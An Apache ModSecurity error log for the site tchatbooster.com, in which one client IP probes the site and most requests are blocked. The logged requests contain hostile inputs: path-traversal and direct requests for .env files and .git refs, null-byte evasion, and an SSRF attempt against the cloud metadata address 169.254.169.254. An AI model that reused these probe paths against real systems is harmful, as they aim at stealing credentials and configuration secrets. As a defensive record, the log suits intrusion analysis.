[Tue May 12 04:39:03.269934 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.270125 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.270182 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.270218 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.270609 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.271237 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:50404] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSxwgpmE1yW0glLdgfDwAAAMw"]
[Tue May 12 04:39:03.271321 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:50404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSxwgpmE1yW0glLdgfDwAAAMw"]
[Tue May 12 04:39:03.271472 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:50404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSxwgpmE1yW0glLdgfDwAAAMw"]
[Tue May 12 04:39:03.274009 2026] [security2:error] [pid 1825179:tid 1825212] [client 45.148.10.166:50438] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.txt"] [unique_id "agKSx9r1yOh9TvizeziPrQAAAE4"]
[Tue May 12 04:39:03.274162 2026] [security2:error] [pid 1825179:tid 1825212] [client 45.148.10.166:50438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.txt"] [unique_id "agKSx9r1yOh9TvizeziPrQAAAE4"]
[Tue May 12 04:39:03.287972 2026] [core:error] [pid 1825287:tid 1825307] [client 45.148.10.166:50382] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 04:39:03.295623 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:50384] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKSx3o6NvB9WXx5V-6euQAAAQ8"]
[Tue May 12 04:39:03.295773 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:50384] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKSx3o6NvB9WXx5V-6euQAAAQ8"]
[Tue May 12 04:39:03.304105 2026] [security2:error] [pid 1730207:tid 1730233] [client 45.148.10.166:50374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.ENV"] [unique_id "agKSxzue9Sp-pIv_Bb61GAAAAVg"]
[Tue May 12 04:39:03.304329 2026] [security2:error] [pid 1730207:tid 1730233] [client 45.148.10.166:50374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.ENV"] [unique_id "agKSxzue9Sp-pIv_Bb61GAAAAVg"]
[Tue May 12 04:39:03.323842 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:50356] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSxzue9Sp-pIv_Bb61GQAAAUU"]
[Tue May 12 04:39:03.324600 2026] [security2:error] [pid 1730207:tid 1730214] [client 45.148.10.166:50356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSxzue9Sp-pIv_Bb61GQAAAUU"]
[Tue May 12 04:39:03.342875 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.166:49936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw81tk6y7yBJLpJopcQAAAJU"]
[Tue May 12 04:39:03.359469 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:49816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw81tk6y7yBJLpJopdwAAAI0"]
[Tue May 12 04:39:03.888814 2026] [security2:error] [pid 1730175:tid 1730190] [client 45.148.10.166:50018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxHo6NvB9WXx5V-6esAAAAQ0"], referer: https://tchatbooster.com/storage/../../../.env
[Tue May 12 04:39:03.906420 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.166:49908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxDue9Sp-pIv_Bb61DwAAAVY"]
[Tue May 12 04:39:04.386525 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:50454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSyAgpmE1yW0glLdgfEQAAAMY"]
[Tue May 12 04:39:04.386732 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:50454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKSyAgpmE1yW0glLdgfEQAAAMY"]
[Tue May 12 04:39:04.396131 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.166:50056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxM1tk6y7yBJLpJopfAAAAIo"], referer: https://tchatbooster.com/.env.local
[Tue May 12 04:39:04.404465 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.166:50206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxNr1yOh9TvizeziPpwAAAEA"]
[Tue May 12 04:39:04.904144 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.166:49836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwxfeipD4uoG21FoibQAAAAg"]
[Tue May 12 04:39:04.952811 2026] [security2:error] [pid 1730175:tid 1730193] [client 45.148.10.166:49852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxHo6NvB9WXx5V-6esQAAARA"]
[Tue May 12 04:39:05.049671 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxRfeipD4uoG21FoidgAAABc"]
[Tue May 12 04:39:05.050993 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxTue9Sp-pIv_Bb61EQAAAUw"], referer: https://tchatbooster.com/.env.save
[Tue May 12 04:39:05.548394 2026] [security2:error] [pid 1730175:tid 1730192] [client 45.148.10.166:50384] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSx3o6NvB9WXx5V-6euQAAAQ8"]
[Tue May 12 04:39:05.579937 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.166:50190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxHo6NvB9WXx5V-6ergAAAQg"], referer: https://tchatbooster.com/backend/.env
[Tue May 12 04:39:06.234103 2026] [core:error] [pid 1825287:tid 1825313] [client 45.148.10.166:50514] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 04:39:06.662184 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.166:50230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxdr1yOh9TvizeziPqQAAAE0"], referer: https://tchatbooster.com/.git/refs/heads/master
[Tue May 12 04:39:06.663718 2026] [security2:error] [pid 1730175:tid 1730180] [client 45.148.10.166:50036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxno6NvB9WXx5V-6etgAAAQM"], referer: https://tchatbooster.com/.git/refs/heads/main
[Tue May 12 04:39:06.672009 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.672075 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.672103 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.672296 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
[Tue May 12 04:39:06.672356 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.166:50534] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSytr1yOh9TvizeziPtAAAAFE"]
